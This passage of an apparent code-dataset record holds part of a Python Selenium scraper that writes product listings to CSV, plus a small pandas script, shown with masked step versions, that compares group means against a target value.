',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 7:\n file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 8:\n file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 9:\n file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 10:\n file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 11:\n file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 12:\n file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 13:\n file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 14:\n file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + csv_image_url[13] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 15:\n file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + csv_image_url[13] + ',' + csv_image_url[14] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 16:\n file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + csv_image_url[13] + ',' + csv_image_url[14] + ',' + csv_image_url[15] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 17:\n file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + csv_image_url[13] + ',' + csv_image_url[14] + ',' + csv_image_url[15] + ',' + csv_image_url[16] + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) >= 18:\n file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + csv_image_url[13] + ',' + csv_image_url[14] + ',' + csv_image_url[15] + ',' + csv_image_url[16] + ',' + csv_image_url[17] + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n # article_number_list.append(csv_article_number)\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error3')\n\n # for m in range(0, 20): IF YOU WANT TO DOWNLOAD CERTAIN PRODUCTS, YOU CAN WRITE LIKE THIS.\n # for m in range(0, len(list4)): IF YOU WANT TO DOWNLOAD ALL PRODUCTS, YOU CAN WRITE LIKE THIS.\n for m in range(0, len(list4)):\n try:\n if list4[m] not in old_product_url:\n self.loggger.info('********************** ' + str(k) + ' ******************************')\n self.driver.get(list4[m])\n WebDriverWait(self.driver, 30).until(EC.presence_of_element_located((By.ID,'breadcrumbs')))\n\n # breadcrumbs = self.driver.find_element_by_id('breadcrumbs')\n # categories = breadcrumbs.find_elements_by_xpath('.//a')\n # for category in categories:\n # csv_categories.append(category.text)\n\n offer = self.driver.find_element_by_id('productPageUpper')\n try:\n heading = offer.find_element_by_class_name('pHeader')\n csv_heading = heading.text.replace(',', '.')\n except:\n self.loggger.info('heading4 non-exist')\n csv_heading = ''\n\n try:\n stock = offer.find_element_by_class_name('instock')\n csv_stock = stock.text\n except:\n csv_stock = 'Out of stock'\n self.loggger.info('stock4 non-exist')\n\n try:\n price_new = offer.find_element_by_class_name('priceRegular')\n csv_price_new = price_new.text.split(' ')[0]\n except:\n try:\n price_new = offer.find_element_by_class_name('priceNew')\n csv_price_new = price_new.text.split(' ')[0]\n \n price_old = offer.find_element_by_class_name('priceOld')\n csv_price_old = price_old.text.split(' ')[0]\n except:\n self.loggger.info('price4 non-exist')\n csv_price_new = ''\n csv_price_old = ''\n\n try:\n desc = offer.find_element_by_id('pDesc')\n csv_desc = desc.get_attribute('innerHTML').replace(',', '-').replace('\\n', ' ').replace('\\r', '').rstrip().lstrip()\n except:\n self.loggger.info('description4 non-exist')\n csv_desc = ''\n\n try:\n article_number = offer.find_element_by_id('pManufacturer')\n csv_article_number = article_number.text.split(' ')[-1].replace(',', '.')\n except:\n self.loggger.info('article number4 non-exist')\n csv_article_number = ''\n \n try:\n pimages = offer.find_elements_by_xpath('.//img')\n csv_image_url = []\n for pimage in pimages:\n image_url = pimage.get_attribute('src')\n if image_url not in csv_image_url:\n csv_image_url.append(image_url)\n except:\n self.loggger.info('image4 non-exist')\n\n ######################################### CSV File Writing #########################################\n # if csv_article_number not in article_number_list:\n if len(csv_image_url) == 1:\n file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 2:\n file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 3:\n file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 4:\n file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 5:\n file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 6:\n file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 7:\n file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 8:\n file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 9:\n file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 10:\n file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 11:\n file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 12:\n file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 13:\n file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 14:\n file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + csv_image_url[13] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 15:\n file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + csv_image_url[13] + ',' + csv_image_url[14] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 16:\n file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + csv_image_url[13] + ',' + csv_image_url[14] + ',' + csv_image_url[15] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 17:\n file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + csv_image_url[13] + ',' + csv_image_url[14] + ',' + csv_image_url[15] + ',' + csv_image_url[16] + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) >= 18:\n file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + csv_image_url[13] + ',' + csv_image_url[14] + ',' + csv_image_url[15] + ',' + csv_image_url[16] + ',' + csv_image_url[17] + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n # article_number_list.append(csv_article_number)\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error4')\n \n file.close()\n self.driver.close()\n",
"step-ids": [
2,
3,
5,
6,
7
]
}
|
[
2,
3,
5,
6,
7
] |
import pandas as pd
import numpy as np
import sys
#Best Mean Test
if len(sys.argv) <= 3:
print("Not enough args usage: anova.py <*.csv> <rv1,rv2> <target to beat>")
print("ex: best-mean.py testdata.csv nicdrop 95000")
print("<rv> is response variable")
exit()
target_to_beat = int(sys.argv[3]) #factors
rv = sys.argv[2].split(',')
data = pd.read_csv(sys.argv[1], header=[0,1])
response_var = data[[rv[0],'factors']]
response_var.columns = response_var.columns.get_level_values(1)
print("Re-run factor means")
print(response_var.groupby('code')[rv[1]].mean())
print("Lowest observed sample mean (target to beat)")
print(response_var.groupby('code')[rv[1]].mean().min())
#print factors still remaining as viable
candidiate_factors_index = response_var.groupby('code')[rv[1]].mean().index.array.to_numpy() #all factors from csv
improved_factors_bools = (response_var.groupby('code')[rv[1]].mean() < target_to_beat).to_numpy() #boolean series
all = ""
i=0
for y in candidiate_factors_index:
if improved_factors_bools[i]:
all = all + y + ","
i=i+1
print("Effects")
if len(all) == 0:
print("NONE")
exit()
print(all.rstrip(','))
|
normal
|
{
"blob_id": "b9e78629fe094d933fdc0ffa2f9d9d1880e78c12",
"index": 9078,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif len(sys.argv) <= 3:\n print('Not enough args usage: anova.py <*.csv> <rv1,rv2> <target to beat>')\n print('ex: best-mean.py testdata.csv nicdrop 95000')\n print('<rv> is response variable')\n exit()\n<mask token>\nprint('Re-run factor means')\nprint(response_var.groupby('code')[rv[1]].mean())\nprint('Lowest observed sample mean (target to beat)')\nprint(response_var.groupby('code')[rv[1]].mean().min())\n<mask token>\nfor y in candidiate_factors_index:\n if improved_factors_bools[i]:\n all = all + y + ','\n i = i + 1\nprint('Effects')\nif len(all) == 0:\n print('NONE')\n exit()\nprint(all.rstrip(','))\n",
"step-3": "<mask token>\nif len(sys.argv) <= 3:\n print('Not enough args usage: anova.py <*.csv> <rv1,rv2> <target to beat>')\n print('ex: best-mean.py testdata.csv nicdrop 95000')\n print('<rv> is response variable')\n exit()\ntarget_to_beat = int(sys.argv[3])\nrv = sys.argv[2].split(',')\ndata = pd.read_csv(sys.argv[1], header=[0, 1])\nresponse_var = data[[rv[0], 'factors']]\nresponse_var.columns = response_var.columns.get_level_values(1)\nprint('Re-run factor means')\nprint(response_var.groupby('code')[rv[1]].mean())\nprint('Lowest observed sample mean (target to beat)')\nprint(response_var.groupby('code')[rv[1]].mean().min())\ncandidiate_factors_index = response_var.groupby('code')[rv[1]].mean(\n ).index.array.to_numpy()\nimproved_factors_bools = (response_var.groupby('code')[rv[1]].mean() <\n target_to_beat).to_numpy()\nall = ''\ni = 0\nfor y in candidiate_factors_index:\n if improved_factors_bools[i]:\n all = all + y + ','\n i = i + 1\nprint('Effects')\nif len(all) == 0:\n print('NONE')\n exit()\nprint(all.rstrip(','))\n",
